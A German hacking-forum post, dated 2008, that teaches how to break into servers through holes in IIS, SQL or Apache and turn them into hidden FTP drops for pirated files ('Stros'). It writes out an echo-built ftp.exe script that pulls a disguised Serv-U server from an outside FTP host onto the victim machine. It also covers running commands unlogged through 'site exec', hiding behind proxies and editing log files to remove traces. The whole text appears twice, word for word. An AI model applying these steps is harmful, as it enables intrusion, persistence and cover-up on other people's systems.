Sirius.GER
29.10.2008, 22:02
1) "Stros hacken" worum gehts?
2) "Stros hacken" wie gehts?
*******************
*****))) 1 (((***** - Worum gehts, was ist das Ziel?
*******************
Stros kennt ihr. Ihr wisst, daß sie anders sind als normale Pubs. Man kann fast immer davon flashen. Man hat einen Benutzernamen und Passwort und einen anderen Port als 21 (in der Regel). Und das alles ist so, weil sie von jemandem "gehax0red" wurden. So weit so gut. Aber was genau wird wie gehax0red? Was muss ich tun, damit ein beliebiger Server hinterher einen FTP-Zugang mit massig tollen Sachen bereit hält?
Nun, das ist alles schnell erklärt:
Der Hax0r verschafft sich über eine Sicherheitslücke Zugang zum entfernten Rechner und richtet dort einen FTP-Server ein. Das ist schon alles.
*******************
*****))) 2 (((***** - Und wie geht das?
*******************
Um diese Frage zu beantworten muss man nun schon etwas weiter ausholen *g*
Also es ist bekannterweise so, daß es in nahezu jeder Software kleinere oder größere Programmierfehler gibt. Manche wirken sich als harmlose Bugs aus, indem sie den User mit schwachsinnigem bis ärgerlichem Fehlverhalten entnerven (zum Nachvollziehen nehme man eine beliebige Windows CD und installiere sie auf seinem PC. Danach nur noch starten und zuschauen ;o) ). Manche Fehler können jedoch zu ausgewachsenen Sicherheitslücken führen, die so weit gehen können, daß fremde vollen Zugriff auf das sich auf dem Server befindliche Betriebssystem erhalten können. Solche Sicherheitslücken werden auf einschlägigen Security-Sites und Mailinglists diskutiert.
Ich muss mich also über Sicherheitslücken in populärer Serversoftware informieren. Dabei fallen dann einem gleich Kandidaten wie IIS, SQL oder auch Apache-Server ins Auge. Nachdem man sich darüber informiert hat, wie man sich die Sicherheitslücke in einer bestimmten Software zu Nutze macht, sollte man in der Lage sein, Befehle von der cmd.exe (bei Windows Systemen) ausführen zu lassen, was nichts anderes ist als die Konsole bzw. MS-Dos-Eingabeaufforderung. ich hoffe ihr denkt immer an eure Sicherheit und kümmert euch um proxys bevor ihr euch mit dem Zielrechner verbindet.
Ihr könnt also ohne Probleme einen FTP-Server auf dem Server installieren. Oder nicht? Erstmal muss sich dort natürlich auch einer befinden. Oft ist schon einer da: Der vom IIS. Denn könnten wir mit dem net start Befehl starten. Allerdings empfiehlt sich das nicht. Wir wollen ja die volle Kontrolle haben.
Also sollten wir zusehen, daß wir irgendwie einen ordentlichen FTP-Server auf den Zielrechner zu bekommen. Hierzu empfiehlt sich Serv-U besonders. Es sind nur wenig Files, die man auf den Zielrechner schicken muss und man kann ihn gut tarnen indem man die Files z.B. umbenennt. Es empfiehlt sich auch, Serv-U erst einmal auf dem eigenen Rechner zu installieren und ordentlich zu konfigurieren, damit man eine fertige .ini Datei hat. Hinterher braucht man nurnoch die Dateien servudaemon.exe und servudaemon.ini und (je nach Version) vielleicht noch die TzoLibr.dll. Man kann auch noch eigene Textfiles anfertigen, die beim Einloggen und Verzeichniswechseln angezeigt werden. Hinterher kann man Serv-U bequem per Remote Admin Tool fernbedienen.
WICHTIG: Das Logging sollte bei Serv-U unbedingt ausgeschaltet sein (ist standardmäßig so).
Um die Files auf den Zielrechner zu bekommen haben wir 2 brauchbare Möglichkeiten:
1. TFTP Server auf dem eigenen PC installieren und die Files per TFTP holen. Nach Möglichkeit sollte man auf diese Methode jedoch verzichten, da man dann seine eigene IP-Adresse angeben muss.
2. Die Files auf einem FTP-Server zwischenlagern und von dort auf den Zielrechner downloaden. Auf diese Methode will ich hier näher eingehen, genauer gesagt auf die Echo-Methode.
Bei der Echo-Methode legt man eine kleine .txt-Datei an, die ein Script für ftp.exe darstellt. So kann man sich mit ftp.exe mit nur einer Zeile zu dem FTP-Server verbinden und alle Files downloaden. Die .txt-Datei legt man mit Hilfe des echo-Befehls an. Dazu gibt man nacheinander folgende Zeilen ein:
echo open [FTP-SERVER] > c:\winnt\system32\file.txt
echo user [BENUTZERNAME] [PASSWORT] >> c:\winnt\system32\file.txt
echo binary >> c:\winnt\system32\file.txt
echo lcd c:\[ZIELPFAD] >> c:\winnt\system32\file.txt
echo cd "[PFAD MIT SERV-U FILES AUF FTP]" >> c:\winnt\system32\file.txt
echo get servudaemon.ini >> c:\winnt\system32\file.txt
echo get servudaemon.exe >> c:\winnt\system32\file.txt
echo quit >> c:\winnt\system32\file.txt
Danach stehen die obigen Zeilen nun genau so aber ohne "echo" am Anfang in c:\winnt\system32\file.txt . Nun startet man ftp.exe und läasst es das Script abarbeiten:
ftp -n -v -s:c:\winnt\system32\file.txt
ftp.exe startet nun und führt jeden Befehl nacheinander aus, wodurch alles ein paar Minuten hängen kann, bis die Files downgeloaded sind. Dann muss man nur noch die servudameon.exe ausführen, um den Server zu starten und sollte sich dann mit dem eingestellten Benutzernamen, Passwort und Port per FTP-Client verbinden können. Man sollte bei seinem eigenen Axx File Execute erlauben (kann man im Admin Tool einstellen) und kann dann Befehler über den FTP-Clienten ausführen (RAW COMMAND -> "site exec <befehl>"). Das wird dann nicht mitgeloggt. - Wo wir beim nächsten Thema wären: Den Logfiles. Nachdem euer FTP-Server läuft, solltet ihr die HDD direkt mal nach Logdateien durchsuchen. Die relevanten Dateien findet ihr an verschiedenen Stellen, je nachdem, wo das Programm über das ihr euch mit dem Server verbunden habt (SQL, IIS etc.) seine Logfiles ablegt. Ihr sollten die Logdateien jedoch nicht komplett löschen, das ist recht auffällig. Bearbeitet sie und entfernt nur alle Einträge die auf euch hinweisen.
Das war auch eigentlich schon alles, was ich zu dem Thema sagen will. Ich hoffe, ich habe einigen Leuten etwas auf die Sprünge geholfen
2) "Stros hacken" wie gehts?
*******************
*****))) 1 (((***** - Worum gehts, was ist das Ziel?
*******************
Stros kennt ihr. Ihr wisst, daß sie anders sind als normale Pubs. Man kann fast immer davon flashen. Man hat einen Benutzernamen und Passwort und einen anderen Port als 21 (in der Regel). Und das alles ist so, weil sie von jemandem "gehax0red" wurden. So weit so gut. Aber was genau wird wie gehax0red? Was muss ich tun, damit ein beliebiger Server hinterher einen FTP-Zugang mit massig tollen Sachen bereit hält?
Nun, das ist alles schnell erklärt:
Der Hax0r verschafft sich über eine Sicherheitslücke Zugang zum entfernten Rechner und richtet dort einen FTP-Server ein. Das ist schon alles.
*******************
*****))) 2 (((***** - Und wie geht das?
*******************
Um diese Frage zu beantworten muss man nun schon etwas weiter ausholen *g*
Also es ist bekannterweise so, daß es in nahezu jeder Software kleinere oder größere Programmierfehler gibt. Manche wirken sich als harmlose Bugs aus, indem sie den User mit schwachsinnigem bis ärgerlichem Fehlverhalten entnerven (zum Nachvollziehen nehme man eine beliebige Windows CD und installiere sie auf seinem PC. Danach nur noch starten und zuschauen ;o) ). Manche Fehler können jedoch zu ausgewachsenen Sicherheitslücken führen, die so weit gehen können, daß fremde vollen Zugriff auf das sich auf dem Server befindliche Betriebssystem erhalten können. Solche Sicherheitslücken werden auf einschlägigen Security-Sites und Mailinglists diskutiert.
Ich muss mich also über Sicherheitslücken in populärer Serversoftware informieren. Dabei fallen dann einem gleich Kandidaten wie IIS, SQL oder auch Apache-Server ins Auge. Nachdem man sich darüber informiert hat, wie man sich die Sicherheitslücke in einer bestimmten Software zu Nutze macht, sollte man in der Lage sein, Befehle von der cmd.exe (bei Windows Systemen) ausführen zu lassen, was nichts anderes ist als die Konsole bzw. MS-Dos-Eingabeaufforderung. ich hoffe ihr denkt immer an eure Sicherheit und kümmert euch um proxys bevor ihr euch mit dem Zielrechner verbindet.
Ihr könnt also ohne Probleme einen FTP-Server auf dem Server installieren. Oder nicht? Erstmal muss sich dort natürlich auch einer befinden. Oft ist schon einer da: Der vom IIS. Denn könnten wir mit dem net start Befehl starten. Allerdings empfiehlt sich das nicht. Wir wollen ja die volle Kontrolle haben.
Also sollten wir zusehen, daß wir irgendwie einen ordentlichen FTP-Server auf den Zielrechner zu bekommen. Hierzu empfiehlt sich Serv-U besonders. Es sind nur wenig Files, die man auf den Zielrechner schicken muss und man kann ihn gut tarnen indem man die Files z.B. umbenennt. Es empfiehlt sich auch, Serv-U erst einmal auf dem eigenen Rechner zu installieren und ordentlich zu konfigurieren, damit man eine fertige .ini Datei hat. Hinterher braucht man nurnoch die Dateien servudaemon.exe und servudaemon.ini und (je nach Version) vielleicht noch die TzoLibr.dll. Man kann auch noch eigene Textfiles anfertigen, die beim Einloggen und Verzeichniswechseln angezeigt werden. Hinterher kann man Serv-U bequem per Remote Admin Tool fernbedienen.
WICHTIG: Das Logging sollte bei Serv-U unbedingt ausgeschaltet sein (ist standardmäßig so).
Um die Files auf den Zielrechner zu bekommen haben wir 2 brauchbare Möglichkeiten:
1. TFTP Server auf dem eigenen PC installieren und die Files per TFTP holen. Nach Möglichkeit sollte man auf diese Methode jedoch verzichten, da man dann seine eigene IP-Adresse angeben muss.
2. Die Files auf einem FTP-Server zwischenlagern und von dort auf den Zielrechner downloaden. Auf diese Methode will ich hier näher eingehen, genauer gesagt auf die Echo-Methode.
Bei der Echo-Methode legt man eine kleine .txt-Datei an, die ein Script für ftp.exe darstellt. So kann man sich mit ftp.exe mit nur einer Zeile zu dem FTP-Server verbinden und alle Files downloaden. Die .txt-Datei legt man mit Hilfe des echo-Befehls an. Dazu gibt man nacheinander folgende Zeilen ein:
echo open [FTP-SERVER] > c:\winnt\system32\file.txt
echo user [BENUTZERNAME] [PASSWORT] >> c:\winnt\system32\file.txt
echo binary >> c:\winnt\system32\file.txt
echo lcd c:\[ZIELPFAD] >> c:\winnt\system32\file.txt
echo cd "[PFAD MIT SERV-U FILES AUF FTP]" >> c:\winnt\system32\file.txt
echo get servudaemon.ini >> c:\winnt\system32\file.txt
echo get servudaemon.exe >> c:\winnt\system32\file.txt
echo quit >> c:\winnt\system32\file.txt
Danach stehen die obigen Zeilen nun genau so aber ohne "echo" am Anfang in c:\winnt\system32\file.txt . Nun startet man ftp.exe und läasst es das Script abarbeiten:
ftp -n -v -s:c:\winnt\system32\file.txt
ftp.exe startet nun und führt jeden Befehl nacheinander aus, wodurch alles ein paar Minuten hängen kann, bis die Files downgeloaded sind. Dann muss man nur noch die servudameon.exe ausführen, um den Server zu starten und sollte sich dann mit dem eingestellten Benutzernamen, Passwort und Port per FTP-Client verbinden können. Man sollte bei seinem eigenen Axx File Execute erlauben (kann man im Admin Tool einstellen) und kann dann Befehler über den FTP-Clienten ausführen (RAW COMMAND -> "site exec <befehl>"). Das wird dann nicht mitgeloggt. - Wo wir beim nächsten Thema wären: Den Logfiles. Nachdem euer FTP-Server läuft, solltet ihr die HDD direkt mal nach Logdateien durchsuchen. Die relevanten Dateien findet ihr an verschiedenen Stellen, je nachdem, wo das Programm über das ihr euch mit dem Server verbunden habt (SQL, IIS etc.) seine Logfiles ablegt. Ihr sollten die Logdateien jedoch nicht komplett löschen, das ist recht auffällig. Bearbeitet sie und entfernt nur alle Einträge die auf euch hinweisen.
Das war auch eigentlich schon alles, was ich zu dem Thema sagen will. Ich hoffe, ich habe einigen Leuten etwas auf die Sprünge geholfen